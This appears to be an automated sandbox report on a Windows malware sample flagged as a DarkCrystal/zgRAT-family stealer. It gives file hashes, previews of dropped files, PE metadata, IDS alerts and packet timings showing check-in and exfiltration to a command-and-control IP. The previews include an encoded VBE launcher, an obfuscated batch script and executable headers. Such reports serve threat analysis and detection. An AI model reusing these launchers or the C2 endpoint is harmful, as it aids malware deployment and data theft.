File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	55
Entropy (8bit):	5.071913349730951
Encrypted:	false
SSDEEP:	3:ZWfSxRyfJzxy1d0Zib+n:USGE+
MD5:	DA57800C5E60B02CED78DEAE55FFBA92
SHA1:	4F84B6C5819C63E2FBA45C21EA693BFA12583B73
SHA-256:	4390DF7E6A072B6CE09AC35A059F9D9FB30CDD845EB255A5F03843DF24E81B00
SHA-512:	708C4D50932C29F2F3A2C1FE71FDBBCA491FCF474319CE6FFE8A8433073343D21ADBA36AAA0A13C01D925380CD2A44AB162A4535545454CA6351F3D35942ECFC
Malicious:	false
Preview:	tgu3OcCkhr6TmUO55DBtWzl1g2TQ1FWNhBonT1Q9Ozxz4YHyaJ9bHkq

C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe

Download File

Process:	C:\providerBrowserruntimeCrt\Providerbroker.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	10393088
Entropy (8bit):	3.7593823756442295
Encrypted:	false
SSDEEP:	98304:w4nrXaOTm08kwmLyo/0YwWXWkcftzkmaGHBXRaLWUJDCU:w4rXbm08oLSYwuWkcfCmPXRaLLVCU
MD5:	ADAE028E0A5A72D219A02BB06D92241A
SHA1:	7CAE683F773D541BD5C76CE6491CCB2F2F05C08A
SHA-256:	3AC51E8FC3AA517AEA4640EFAFFA1B04301C14DC876104E09AB9B7A3A95A0415
SHA-512:	FE8EF741DE45A6BDE2B48322EF33EE9662B0CBC4CAABB582F405850CB0AB58D286E96C5E28E47A0968B17BAE6874F938973D6ED7F27E6A9DB3A16ED0B63AA1E6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 79%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.................j;...........;.. ....;...@.. ........................;...........@...................................;.K.....;.p.....................;...................................................... ............... ..H............text...4i;.. ...j;................. ..`.rsrc...p.....;......l;.............@....reloc........;......p;.............@..B..................;.....H.......4..........p.......7.0.\.;......................................0..........(.... ........8........E........9......)...8....(.... ....~....{....:....& ....8....(.... ....8....(.... ....~....{....9....& ....8........0.......... ........8........E........u...........P.......8....~....(G... .... .... ....s....~....(K....... ....~....{....:....& ....8.......... ....~....{e...9y...& ....8n.......~....(O...~....(S... ....<.... ....~....{e...98...& ....8-...r...ps....z*8..

C:\providerBrowserruntimeCrt\EOj1ahBHdasVqOTXmQoagNDGVj6XidHKqZ.bat

Download File

Process:	C:\Users\user\Desktop\9FwQYJSj4N.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	95
Entropy (8bit):	5.037607999811609
Encrypted:	false
SSDEEP:	3:1wPzlOMg/lGpQoshSim7xkr5XAHqb4Wj:cOXlfrKE2KF
MD5:	6A27BB68B8361F5C428BC5912E0B30A8
SHA1:	8F9454891678312A7F0AD11C5C358C43918744BE
SHA-256:	A38CFF54666BB5717BE57BC2795DD5DC501042C413E75256F0991377DC531E98
SHA-512:	879FA7E224BB2445E32871A6C4A13EAA5919336F0E272E6A0AE779A79E7072F48AA68AEDD0EEF7071159DDBD68703288E7EBFBBA39153AF814D511DA28DCB799
Malicious:	false
Preview:	%uUjYGz%%kBVzEYErcZ%..%chsfXtLuMIxldNw%"C:\providerBrowserruntimeCrt/Providerbroker.exe"%iqeGd%

C:\providerBrowserruntimeCrt\Providerbroker.exe

Download File

Process:	C:\Users\user\Desktop\9FwQYJSj4N.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	10393088
Entropy (8bit):	3.7593823756442295
Encrypted:	false
SSDEEP:	98304:w4nrXaOTm08kwmLyo/0YwWXWkcftzkmaGHBXRaLWUJDCU:w4rXbm08oLSYwuWkcfCmPXRaLLVCU
MD5:	ADAE028E0A5A72D219A02BB06D92241A
SHA1:	7CAE683F773D541BD5C76CE6491CCB2F2F05C08A
SHA-256:	3AC51E8FC3AA517AEA4640EFAFFA1B04301C14DC876104E09AB9B7A3A95A0415
SHA-512:	FE8EF741DE45A6BDE2B48322EF33EE9662B0CBC4CAABB582F405850CB0AB58D286E96C5E28E47A0968B17BAE6874F938973D6ED7F27E6A9DB3A16ED0B63AA1E6
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\providerBrowserruntimeCrt\Providerbroker.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\providerBrowserruntimeCrt\Providerbroker.exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 79%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.................j;...........;.. ....;...@.. ........................;...........@...................................;.K.....;.p.....................;...................................................... ............... ..H............text...4i;.. ...j;................. ..`.rsrc...p.....;......l;.............@....reloc........;......p;.............@..B..................;.....H.......4..........p.......7.0.\.;......................................0..........(.... ........8........E........9......)...8....(.... ....~....{....:....& ....8....(.... ....8....(.... ....~....{....9....& ....8........0.......... ........8........E........u...........P.......8....~....(G... .... .... ....s....~....(K....... ....~....{....:....& ....8.......... ....~....{e...9y...& ....8n.......~....(O...~....(S... ....<.... ....~....{e...98...& ....8-...r...ps....z*8..

C:\providerBrowserruntimeCrt\RKDq4baPXf3oYQLQ9KOfosRSo5hZYYngNhYF.vbe

Download File

Process:	C:\Users\user\Desktop\9FwQYJSj4N.exe
File Type:	data
Category:	dropped
Size (bytes):	237
Entropy (8bit):	5.933289769131268
Encrypted:	false
SSDEEP:	6:Gz2wqK+NkLzWbH+8nZNDd3RL1wQJRTog7UsAO6oWos:GPMCzWL+4d3XBJF5AOGX
MD5:	3822081A726CF45F5A91C6BA974A3BDE
SHA1:	EF5AB0FA613F78A981F4E9FA1C8314250005AA40
SHA-256:	93E4B258974F799C2A141CF067F58EFAA8918D7168A4CBD183BB2A9522AC709D
SHA-512:	D1F21A527614C29078DDE98FA2D4FAE8F29FFE7893319BFFBBD2DB29B94868B0B1043DDE689C38808DB35F0DE6546DA99A12AE8DF54A1643CE212CE3478AD24A
Malicious:	false
Preview:	#@~^1AAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2vcT!Zb@#@&j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~J;lJw.K\bN+MAMGhk+.D!xOrs+ZMOzJ2rNqCt~C9ld.56:(hpKCogf!#Nv(r[_\|5}c8mYEBPZ~P6l^d+CUUAAA==^#~@.

\Device\Null

Download File

Process:	C:\Windows\System32\PING.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	502
Entropy (8bit):	4.613055660879929
Encrypted:	false
SSDEEP:	12:PJ75pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:hddUOAokItULVDv
MD5:	BA57C35C880CE32BEBF26BD30E6FFB9A
SHA1:	AC7A5CFA4421D714D0C1D29918BC13F4B438036C
SHA-256:	C63D3363B61BF3717BE07449F88D342C3FB441D93FD5D036C5678E190339DA32
SHA-512:	55BE70A45B88E3DF4CFE1A5B48922ECEF507C76312754C1BBF1AF990F5BAA8E910A84B4403CF10057FB57750AE77E10074E2E24D038F14CD7D4EA3071EC0F263
Malicious:	false
Preview:	..Pinging 134349 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	3.8871788402581697
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	9FwQYJSj4N.exe
File size:	10'714'393 bytes
MD5:	9342be038f6ff329aaffdc2626f8d145
SHA1:	5e2bc708ba51774175679f7cde6c9900c957bb42
SHA256:	396a47040ce6fbbaf684ae9d4c1abe7bc8901113d3c017f41276145d6a04a103
SHA512:	a407ec677468268d7bebf3e8c4a9b8e4b6a02fd48f9de0b6cfeb2ddb4b96d37be3e4bc880f21557c2bab6fadff55c06d26d2f89b125c8d658291bcc5038ef120
SSDEEP:	98304:uS4nrXaOTm08kwmLyo/0YwWXWkcftzkmaGHBXRaLWUJDCUj:J4rXbm08oLSYwuWkcfCmPXRaLLVCUj
TLSH:	B8B6F106A9625E33C2663F359CE7152D83E0E6613A33EF4B3A1E56917C172709B172B3
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I..>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I..=>...I..=>.

File Icon


Icon Hash:	5171555151515149

Static PE Info

General

Entrypoint:	0x41f530
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	12e12319f1029ec4f8fcbed7e82df162

Entrypoint Preview

Instruction
call 00007F7B8547DBABh
jmp 00007F7B8547D4BDh
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007F7B85470307h
mov dword ptr [esi], 004356D0h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 004356D8h
mov dword ptr [ecx], 004356D0h
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 004356B8h
push eax
call 00007F7B8548094Fh
test byte ptr [ebp+08h], 00000001h
pop ecx
je 00007F7B8547D64Ch
push 0000000Ch
push esi
call 00007F7B8547CC09h
pop ecx
pop ecx
mov eax, esi
pop esi
pop ebp
retn 0004h
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007F7B85470282h
push 0043BEF0h
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007F7B85480409h
int3
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007F7B8547D5C8h
push 0043C0F4h
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007F7B854803ECh
int3
jmp 00007F7B85481E87h
int3
int3
int3
int3
push 00422900h
push dword ptr fs:[00000000h]

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x3d070	0x34	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3d0a4	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x64000	0xdc30	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x72000	0x233c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x3b11c	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x355f8	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x33000	0x278	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x3c5ec	0x120	.rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x31bdc	0x31c00	2831bb8b11e3209658a53131886cdf98	False	0.5909380888819096	data	6.712962136932442	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x33000	0xaec0	0xb000	042f11346230ca5aa360727d9908e809	False	0.4579190340909091	data	5.261605615899847	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x3e000	0x24720	0x1000	9670b581969e508258d8bc903025de5e	False	0.451416015625	data	4.387459135575936	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didat	0x63000	0x190	0x200	c83554035c63bb446c6208d0c8fa0256	False	0.4453125	data	3.3327310103022305	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x64000	0xdc30	0xde00	02ebda78c8c6672a849e2c6c167a637e	False	0.8708474099099099	data	7.662760909642784	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x72000	0x233c	0x2400	40b5e17755fd6fdd34de06e5cdb7f711	False	0.7749565972222222	data	6.623012966548067	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
PNG	0x64524	0xb45	PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced	English	United States	1.0027729636048528
PNG	0x6506c	0x15a9	PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced	English	United States	0.9363390441839495
RT_ICON	0x66618	0x92ca	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced			1.000558837617755
RT_DIALOG	0x6f8e4	0x286	data	English	United States	0.5092879256965944
RT_DIALOG	0x6fb6c	0x13a	data	English	United States	0.60828025477707
RT_DIALOG	0x6fca8	0xec	data	English	United States	0.6991525423728814
RT_DIALOG	0x6fd94	0x12e	data	English	United States	0.5927152317880795
RT_DIALOG	0x6fec4	0x338	data	English	United States	0.45145631067961167
RT_DIALOG	0x701fc	0x252	data	English	United States	0.5757575757575758
RT_STRING	0x70450	0x1e2	data	English	United States	0.3900414937759336
RT_STRING	0x70634	0x1cc	data	English	United States	0.4282608695652174
RT_STRING	0x70800	0x1b8	data	English	United States	0.45681818181818185
RT_STRING	0x709b8	0x146	data	English	United States	0.5153374233128835
RT_STRING	0x70b00	0x46c	data	English	United States	0.3454063604240283
RT_STRING	0x70f6c	0x166	data	English	United States	0.49162011173184356
RT_STRING	0x710d4	0x152	data	English	United States	0.5059171597633136
RT_STRING	0x71228	0x10a	data	English	United States	0.49624060150375937
RT_STRING	0x71334	0xbc	data	English	United States	0.6329787234042553
RT_STRING	0x713f0	0xd6	data	English	United States	0.5747663551401869
RT_GROUP_ICON	0x714c8	0x14	data			1.1
RT_MANIFEST	0x714dc	0x753	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.3957333333333333

Imports

DLL	Import
KERNEL32.dll	GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
OLEAUT32.dll	SysAllocString, SysFreeString, VariantClear
gdiplus.dll	GdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-21T10:02:31.515294+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.5	49734	89.23.96.180	80	TCP
2024-12-21T10:02:54.567893+0100	2048130	ET MALWARE [ANY.RUN] DarkCrystal Rat Exfiltration (POST)	1	192.168.2.5	49798	89.23.96.180	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 21, 2024 10:02:29.978266001 CET	49734	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:30.097752094 CET	80	49734	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:30.099123955 CET	49734	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:30.100028038 CET	49734	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:30.219482899 CET	80	49734	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:30.453583002 CET	49734	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:30.575831890 CET	80	49734	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:31.475451946 CET	80	49734	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:31.515294075 CET	49734	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:31.740101099 CET	80	49734	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:31.740257978 CET	80	49734	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:31.740331888 CET	49734	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:31.947110891 CET	49734	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:32.066755056 CET	80	49734	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:32.296614885 CET	49734	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:32.406435966 CET	80	49734	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:32.416224003 CET	80	49734	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:32.439299107 CET	49741	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:32.452769995 CET	49734	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:32.560434103 CET	80	49741	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:32.560518026 CET	49741	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:32.562841892 CET	49741	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:32.683845043 CET	80	49741	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:32.765929937 CET	80	49734	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:32.812143087 CET	49734	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:32.849848986 CET	49734	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:32.921731949 CET	49741	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:32.970948935 CET	80	49734	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:33.043149948 CET	80	49741	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:33.043164015 CET	80	49741	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:33.043176889 CET	80	49741	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:33.203216076 CET	49734	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:33.310826063 CET	80	49734	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:33.322869062 CET	80	49734	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:33.322916031 CET	80	49734	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:33.359023094 CET	49734	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:33.670953989 CET	80	49734	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:33.718403101 CET	49734	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:33.938683987 CET	80	49741	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:33.984038115 CET	49741	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:34.174393892 CET	80	49741	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:34.218416929 CET	49741	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:34.583419085 CET	49744	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:34.587768078 CET	49734	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:34.587904930 CET	49741	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:34.703128099 CET	80	49744	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:34.703255892 CET	49744	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:34.703413963 CET	49744	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:34.707912922 CET	80	49734	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:34.709244967 CET	49734	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:34.709356070 CET	80	49741	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:34.709434986 CET	49741	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:34.822911024 CET	80	49744	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:35.062254906 CET	49744	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:35.181972027 CET	80	49744	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:35.182010889 CET	80	49744	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:35.182039976 CET	80	49744	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:36.079175949 CET	80	49744	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:36.187189102 CET	49744	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:36.315866947 CET	80	49744	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:36.319422007 CET	49744	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:36.439326048 CET	80	49744	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:36.443104982 CET	49744	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:36.513549089 CET	49751	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:36.635992050 CET	80	49751	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:36.639238119 CET	49751	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:36.639297009 CET	49751	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:36.968291998 CET	80	49751	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:36.984210014 CET	49751	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:37.104099989 CET	80	49751	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:37.104137897 CET	80	49751	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:37.104171991 CET	80	49751	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:38.015741110 CET	80	49751	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:38.187174082 CET	49751	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:38.252110004 CET	80	49751	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:38.296724081 CET	49751	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:38.511385918 CET	49751	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:38.511598110 CET	49757	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:38.631427050 CET	80	49757	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:38.631514072 CET	49757	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:38.631613970 CET	49757	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:38.631620884 CET	80	49751	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:38.631688118 CET	49751	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:38.687810898 CET	49758	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:38.751107931 CET	80	49757	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:38.807450056 CET	80	49758	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:38.807549000 CET	49758	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:38.807656050 CET	49758	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:38.927201033 CET	80	49758	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:38.984097958 CET	49757	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:39.104422092 CET	80	49757	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:39.104454994 CET	80	49757	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:39.104482889 CET	80	49757	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:39.156024933 CET	49758	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:39.275600910 CET	80	49758	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:39.275715113 CET	80	49758	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:40.007849932 CET	80	49757	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:40.062181950 CET	49757	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:40.186721087 CET	80	49758	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:40.244170904 CET	80	49757	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:40.296540976 CET	49758	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:40.422753096 CET	80	49758	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:40.452778101 CET	49757	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:40.499692917 CET	49758	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:41.158329964 CET	49757	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:41.167370081 CET	49758	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:41.167630911 CET	49765	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:41.278685093 CET	80	49757	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:41.278754950 CET	49757	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:41.287209988 CET	80	49765	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:41.287286997 CET	49765	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:41.287386894 CET	80	49758	89.23.96.180	192.168.2.5
Dec 21, 2024 10:02:41.287405968 CET	49765	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:02:41.287441015 CET	49758	80	192.168.2.5	89.23.96.180
